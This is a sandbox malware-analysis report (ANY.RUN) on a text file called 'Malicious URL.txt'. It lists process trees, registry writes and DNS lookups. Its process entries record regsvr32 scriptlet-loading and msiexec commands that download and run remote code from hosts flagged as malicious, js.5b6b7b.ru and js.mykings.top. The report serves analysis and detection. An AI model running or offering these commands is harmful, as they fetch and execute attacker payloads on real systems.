File name:

Malicious URL.txt

Full analysis: https://app.any.run/tasks/3a2c9100-ae38-4eb4-967f-278b62e221c0
Verdict: No threats detected
Analysis date: June 12, 2018, 11:00:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

96227BC30A28075908A1441D06B9309B

SHA1:

12E5344636AE9C8714007F71DCA8808DB74B7930

SHA256:

42CD510C4C8B4DD0FF57ADDCFAD7669ACB6F86400CB8078E4DF6D5DF1965C953

SSDEEP:

6:CzBM0DrVL+Iw/iUr1aScsHiUr1aL2RbHNxqHhwg9caWRl8GiUwgCoDY:gBM0DrVCIw/h5avch5a6btxqBwHaWl/A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • regsvr32.exe (PID: 2412)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start notepad.exe no specs regsvr32.exe no specs msiexec.exe no specs msiexec.exe no specs Shell Security Editor no specs regsvr32.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1752C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2412"C:\Windows\system32\regsvr32.exe" /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dllC:\Windows\system32\regsvr32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2496C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3208"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Malicious URL.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3288"C:\Windows\system32\msiexec.exe" /i http://js.5b6b7b.ru:280/helloworld.msi /qC:\Windows\system32\msiexec.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3412"C:\Windows\system32\regsvr32.exe" /u /s /i:http://js.mykings.top:280/v.sct scrobj.dllC:\Windows\system32\regsvr32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3912"C:\Windows\system32\msiexec.exe" /i http://js.mykings.top:280/helloworld.msiC:\Windows\system32\msiexec.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
123
Read events
99
Write events
24
Delete events
0

Modification events

(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2412) regsvr32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\regsvr32_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
0
Suspicious files
0
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2412regsvr32.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
2
Threats
1

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
js.5b6b7b.ru
malicious
js.mykings.top
malicious

Threats

PID
Process
Class
Message
1052
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
No debug info